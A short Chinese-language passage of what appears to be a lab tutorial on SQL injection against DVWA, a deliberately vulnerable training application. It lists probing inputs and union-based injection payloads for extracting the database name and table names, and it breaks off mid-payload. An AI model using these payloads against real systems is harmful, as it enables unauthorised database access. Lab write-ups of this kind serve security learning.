DVWA之SQL Injection

1.首先，我們發現有個輸入框，判斷是否存在注入點 輸入1： 輸入1': 輸入1 and 1=1: 輸入1 and 1=2:   2:猜測sql語句： 3：爆破： 首先爆庫：1' union select 1,database() 備註：union的使用條件： 猜測會有一張users表 爆users表的列： 1' union select 1,table_name from information_

>>阅读原文<<